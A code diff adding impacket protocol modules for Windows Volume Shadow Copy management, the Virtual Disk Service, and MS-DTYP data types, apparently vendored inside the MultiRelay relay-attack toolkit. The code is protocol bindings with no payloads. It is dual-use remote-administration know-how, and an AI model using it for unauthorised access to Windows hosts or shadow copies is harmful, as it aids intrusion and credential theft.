+    class enumItems(Enum):
+        VSS_VOLSNAP_ATTR_PERSISTENT        = 0x01
+        VSS_VOLSNAP_ATTR_NO_AUTORECOVERY   = 0x02
+        VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04
+        VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE   = 0x08
+        VSS_VOLSNAP_ATTR_NO_WRITERS        = 0x10
+
+# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration
+class VSS_SNAPSHOT_STATE(NDRENUM):
+    class enumItems(Enum):
+        VSS_SS_UNKNOWN  = 0x01
+        VSS_SS_CREATED  = 0x0c
+
+# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration
+class  VSS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_PROV_UNKNOWN  = 0
+
+# 2.2.3.7 VSS_VOLUME_PROP Structure
+class VSS_VOLUME_PROP(NDRSTRUCT):
+    structure = (
+        ('m_pwszVolumeName', VSS_PWSZ),
+        ('m_pwszVolumeDisplayName', VSS_PWSZ),
+    )
+
+# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union
+class VSS_MGMT_OBJECT_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),
+    }
+
+# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure
+class VSS_MGMT_OBJECT_PROP(NDRSTRUCT):
+    structure = (
+        ('Type', VSS_MGMT_OBJECT_TYPE),
+        ('Obj', VSS_MGMT_OBJECT_UNION),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.3 IVssEnumMgmtObject Details
+
+# 3.1.3.1 Next (Opnum 3)
+class IVssEnumMgmtObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumMgmtObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.2.1 Next (Opnum 3)
+class IVssEnumObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+class GetProviderMgmtInterface(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('InterfaceId', VSS_ID),
+    )
+
+class GetProviderMgmtInterfaceResponse(DCOMANSWER):
+    structure = (
+       ('ppItf', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QueryVolumesSupportedForSnapshots(DCOMCALL):
+    opnum = 4
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('IContext', LONG),
+    )
+
+class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QuerySnapshotsByVolume(DCOMCALL):
+    opnum = 5
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+       ('ProviderId', VSS_ID),
+    )
+
+class QuerySnapshotsByVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)
+class QueryDiffAreasForVolume(DCOMCALL):
+    opnum = 6
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasForVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)
+class QueryDiffAreasOnVolume(DCOMCALL):
+    opnum = 7
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasOnVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IVssEnumMgmtObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumMgmtObject
+
+    def Next(self, celt):
+        request = IVssEnumMgmtObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        resp = self.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssEnumObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumObject
+
+    def Next(self, celt):
+        request = IVssEnumObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        dce = self.connect()
+        resp = dce.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssSnapshotMgmt
+
+    def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):
+        req = GetProviderMgmtInterface()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['InterfaceId'] = interfaceId
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryVolumesSupportedForSnapshots(self, providerId, iContext):
+        req = QueryVolumesSupportedForSnapshots()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['IContext'] = iContext
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))
+
+    def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):
+        req = QuerySnapshotsByVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = volumeName
+        req['ProviderId'] = providerId
+        try:
+            resp = self.request(req, self._iid, uuid = self.get_iPid())
+        except DCERPCException as e:
+            print(e)
+            from impacket.winregistry import hexdump
+            data = e.get_packet()
+            hexdump(data)
+            kk = QuerySnapshotsByVolumeResponse(data)
+            kk.dump()
+        #resp.dump()
+        return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt
+
+    def QueryDiffAreasOnVolume(self, pwszVolumeName):
+        req = QueryDiffAreasOnVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryDiffAreasForVolume(self, pwszVolumeName):
+        req = QueryDiffAreasForVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py

@@ -0,0 +1,267 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-VDS]: Virtual Disk Service (VDS) Protocol
+#             This was used as a way to test the DCOM runtime. Further 
+#             testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')
+IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')
+IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')
+IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')
+IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')
+IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')
+IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')
+IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')
+
+error_status_t = ULONG
+
+# 2.2.1.1.3 VDS_OBJECT_ID
+VDS_OBJECT_ID = GUID
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1.3.1 VDS_SERVICE_PROP
+class VDS_SERVICE_PROP(NDRSTRUCT):
+    structure = (
+        ('pwszVersion',LPWSTR),
+        ('ulFlags',ULONG),
+    )
+
+class OBJECT_ARRAY(NDRUniConformantVaryingArray):
+    item = PMInterfacePointer
+
+# 2.2.2.7.1.1 VDS_PROVIDER_TYPE
+class VDS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VDS_PT_UNKNOWN     = 0
+        VDS_PT_SOFTWARE    = 1
+        VDS_PT_HARDWARE    = 2
+        VDS_PT_VIRTUALDISK = 3
+        VDS_PT_MAX         = 4
+
+# 2.2.2.7.2.1 VDS_PROVIDER_PROP
+class VDS_PROVIDER_PROP(NDRSTRUCT):
+    structure = (
+        ('id',VDS_OBJECT_ID),
+        ('pwszName',LPWSTR),
+        ('guidVersionId',GUID),
+        ('pwszVersion',LPWSTR),
+        ('type',VDS_PROVIDER_TYPE),
+        ('ulFlags',ULONG),
+        ('ulStripeSizeFlags',ULONG),
+        ('sRebuildPriority',SHORT),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)
+class IVdsServiceInitialization_Initialize(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('pwszMachineName', LPWSTR),
+    )
+
+class IVdsServiceInitialization_InitializeResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)
+class IVdsService_IsServiceReady(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsService_IsServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)
+class IVdsService_WaitForServiceReady(DCOMCALL):
+    opnum = 4
+    structure = (
+    )
+
+class IVdsService_WaitForServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)
+class IVdsService_GetProperties(DCOMCALL):
+    opnum = 5
+    structure = (
+    )
+
+class IVdsService_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pServiceProp', VDS_SERVICE_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)
+class IVdsService_QueryProviders(DCOMCALL):
+    opnum = 6
+    structure = (
+        ('masks', DWORD),
+    )
+
+class IVdsService_QueryProvidersResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.1.1 IEnumVdsObject Interface
+# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)
+class IEnumVdsObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IEnumVdsObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('ppObjectArray', OBJECT_ARRAY),
+       ('pcFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)
+class IVdsProvider_GetProperties(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsProvider_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pProviderProp', VDS_PROVIDER_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IEnumVdsObject(IRemUnknown2):
+    def Next(self, celt=0xffff):
+        request = IEnumVdsObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+            # If it is S_FALSE(1) means less items were returned
+            if resp['ErrorCode'] != 1:
+                raise
+        interfaces = list()
+        for interface in resp['ppObjectArray']:
+            interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))
+        return interfaces
+
+class IVdsProvider(IRemUnknown2):
+    def GetProperties(self):
+        request = IVdsProvider_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsServiceInitialization(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def Initialize(self):
+        request = IVdsServiceInitialization_Initialize()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['pwszMachineName'] = '\x00'
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsService(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def IsServiceReady(self):
+        request = IVdsService_IsServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+        return resp 
+
+    def WaitForServiceReady(self):
+        request = IVdsService_WaitForServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def GetProperties(self):
+        request = IVdsService_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def QueryProviders(self, masks):
+        request = IVdsService_QueryProviders()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['masks'] = masks
+        resp = self.request(request, uuid = self.get_iPid())
+        return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py

@@ -0,0 +1,542 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-DTYP] Interface mini implementation
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack
+from six import binary_type
+
+from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \
+    NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \
+    NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL
+
+DWORD = NDRULONG
+BOOL = NDRULONG
+UCHAR = NDRUSMALL
+SHORT = NDRSHORT
+NULL = NULL
+
+class LPDWORD(NDRPOINTER):
+    referent = (
+        ('Data', DWORD),
+    )
+
+class PSHORT(NDRPOINTER):
+    referent = (
+        ('Data', SHORT),
+    )
+
+class PBOOL(NDRPOINTER):
+    referent = (
+        ('Data', BOOL),
+    )
+
+class LPBYTE(NDRPOINTER):
+    referent = (
+        ('Data', NDRUniConformantArray),
+    )
+PBYTE = LPBYTE
+
+# 2.2.4 BOOLEAN
+BOOLEAN = NDRBOOLEAN
+
+# 2.2.6 BYTE
+BYTE = NDRUSMALL
+
+# 2.2.7 CHAR
+CHAR = NDRSMALL
+class PCHAR(NDRPOINTER):
+    referent = (
+        ('Data', CHAR),
+    )
+
+class WIDESTR(NDRUniFixedArray):
+    def getDataLen(self, data, offset=0):
+        return data.find(b'\x00\x00\x00', offset)+3-offset
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class STR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                if not isinstance(value, binary_type):
+                    self.fields[key] = value.encode('utf-8')
+                else:
+                    # if it is a binary type (str in Python 2, bytes in Python 3), then we assume it is a raw buffer
+                    self.fields[key] = value
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-8')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            try:
+                return self.fields[key].decode('utf-8')
+            except UnicodeDecodeError:
+                # if we could't decode it, we assume it is a raw buffer
+                return self.fields[key]
+        else:
+            return NDR.__getitem__(self,key)
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]
+
+class LPSTR(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class WSTR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)//2'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)//2'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)//2'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)//2'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]*2 
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class LPWSTR(NDRPOINTER):
+    referent = (
+        ('Data', WSTR),
+    )
+
+# 2.2.5 BSTR
+BSTR = LPWSTR
+
+# 2.2.8 DOUBLE
+DOUBLE = NDRDOUBLEFLOAT
+class PDOUBLE(NDRPOINTER):
+    referent = (
+        ('Data', DOUBLE),
+    )
+
+# 2.2.15 FLOAT
+FLOAT = NDRFLOAT
+class PFLOAT(NDRPOINTER):
+    referent = (
+        ('Data', FLOAT),
+    )
+
+# 2.2.18 HRESULT
+HRESULT = NDRLONG
+class PHRESULT(NDRPOINTER):
+    referent = (
+        ('Data', HRESULT),
+    )
+
+# 2.2.19 INT
+INT = NDRLONG
+class PINT(NDRPOINTER):
+    referent = (
+        ('Data', INT),
+    )
+
+# 2.2.26 LMSTR
+LMSTR = LPWSTR
+
+# 2.2.27 LONG
+LONG = NDRLONG
+class LPLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONG),
+    )
+
+PLONG = LPLONG
+
+# 2.2.28 LONGLONG
+LONGLONG = NDRHYPER
+
+class PLONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONGLONG),
+    )
+
+# 2.2.31 LONG64
+LONG64 = NDRUHYPER
+class PLONG64(NDRPOINTER):
+    referent = (
+        ('Data', LONG64),
+    )
+
+# 2.2.32 LPCSTR
+LPCSTR = LPSTR
+
+# 2.2.36 NET_API_STATUS
+NET_API_STATUS = DWORD
+
+# 2.2.52 ULONG_PTR
+ULONG_PTR = NDRULONG
+# 2.2.10 DWORD_PTR
+DWORD_PTR = ULONG_PTR
+
+# 2.3.2 GUID and UUID
+class GUID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 4
+
+class PGUID(NDRPOINTER):
+    referent = (
+        ('Data', GUID),
+    )
+
+UUID = GUID
+PUUID = PGUID
+
+# 2.2.37 NTSTATUS
+NTSTATUS = DWORD
+
+# 2.2.45 UINT
+UINT = NDRULONG
+class PUINT(NDRPOINTER):
+    referent = (
+        ('Data', UINT),
+    )
+
+# 2.2.50 ULONG
+ULONG = NDRULONG
+class PULONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONG),
+    )
+
+LPULONG = PULONG
+
+# 2.2.54 ULONGLONG
+ULONGLONG = NDRUHYPER
+class PULONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONGLONG),
+    )
+
+# 2.2.57 USHORT
+USHORT = NDRUSHORT
+class PUSHORT(NDRPOINTER):
+    referent = (
+        ('Data', USHORT),
+    )
+
+# 2.2.59 WCHAR
+WCHAR = WSTR
+PWCHAR = LPWSTR
+
+# 2.2.61 WORD
+WORD = NDRUSHORT
+class PWORD(NDRPOINTER):
+    referent = (
+        ('Data', WORD),
+    )
+LPWORD = PWORD
+
+# 2.3.1 FILETIME
+class FILETIME(NDRSTRUCT):
+    structure = (
+        ('dwLowDateTime', DWORD),
+        ('dwHighDateTime', LONG),
+    )
+
+class PFILETIME(NDRPOINTER):
+    referent = (
+        ('Data', FILETIME),
+    )
+
+# 2.3.3 LARGE_INTEGER
+LARGE_INTEGER = NDRHYPER
+class PLARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', LARGE_INTEGER),
+    )
+
+# 2.3.5 LUID
+class LUID(NDRSTRUCT):
+    structure = (
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    )
+
+# 2.3.8 RPC_UNICODE_STRING
+class RPC_UNICODE_STRING(NDRSTRUCT):
+    # Here we're doing some tricks to make this data type
+    # easier to use. It's exactly the same as defined. I changed the
+    # Buffer name for Data, so users can write directly to the datatype
+    # instead of writing to datatype['Buffer'].
+    # The drawback is you cannot directly access the Length and 
+    # MaximumLength fields. 
+    # If you really need it, you will need to do it this way:
+    # class TT(NDRCALL):
+    # structure = (
+    #     ('str1', RPC_UNICODE_STRING),
+    #  )
+    # 
+    # nn = TT()
+    # nn.fields['str1'].fields['MaximumLength'] = 30
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPWSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            try:
+                value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                value = value.decode(sys.getfilesystemencoding())
+            self['Length'] = len(value)*2
+            self['MaximumLength'] = len(value)*2
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+class PRPC_UNICODE_STRING(NDRPOINTER):
+    referent = (
+       ('Data', RPC_UNICODE_STRING ),
+    )
+
+# 2.3.9 OBJECT_TYPE_LIST
+ACCESS_MASK = DWORD
+class OBJECT_TYPE_LIST(NDRSTRUCT):
+    structure = (
+        ('Level', WORD),
+        ('Remaining',ACCESS_MASK),
+        ('ObjectType',PGUID),
+    )
+
+class POBJECT_TYPE_LIST(NDRPOINTER):
+    referent = (
+       ('Data', OBJECT_TYPE_LIST ),
+    )
+
+# 2.3.13 SYSTEMTIME
+class SYSTEMTIME(NDRSTRUCT):
+    structure = (
+        ('wYear', WORD),
+        ('wMonth', WORD),
+        ('wDayOfWeek', WORD),
+        ('wDay', WORD),
+        ('wHour', WORD),
+        ('wMinute', WORD),
+        ('wSecond', WORD),
+        ('wMilliseconds', WORD),
+    )
+
+class PSYSTEMTIME(NDRPOINTER):
+    referent = (
+       ('Data', SYSTEMTIME ),
+    )
+
+# 2.3.15 ULARGE_INTEGER
+class ULARGE_INTEGER(NDRSTRUCT):
+    structure = (
+        ('QuadPart', LONG64),
+    )
+
+class PULARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', ULARGE_INTEGER),
+    )
+
+# 2.4.2.3 RPC_SID
+class DWORD_ARRAY(NDRUniConformantArray):
+    item = '<L'
+
+class RPC_SID_IDENTIFIER_AUTHORITY(NDRUniFixedArray):
+    align = 1
+    align64 = 1
+    def getDataLen(self, data, offset=0):
+        return 6
+
+class RPC_SID(NDRSTRUCT):
+    structure = (
+        ('Revision',NDRSMALL),
+        ('SubAuthorityCount',NDRSMALL),
+        ('IdentifierAuthority',RPC_SID_IDENTIFIER_AUTHORITY),
+        ('SubAuthority',DWORD_ARRAY),
+    )
+    def getData(self, soFar = 0):
+        self['SubAuthorityCount'] = len(self['SubAuthority'])
+        return NDRSTRUCT.getData(self, soFar)
+
+    def fromCanonical(self, canonical):
+        items = canonical.split('-')
+        self['Revision'] = int(items[1])
+        self['IdentifierAuthority'] = b'\x00\x00\x00\x00\x00' + pack('B',int(items[2]))
+        self['SubAuthorityCount'] = len(items) - 3
+        for i in range(self['SubAuthorityCount']):
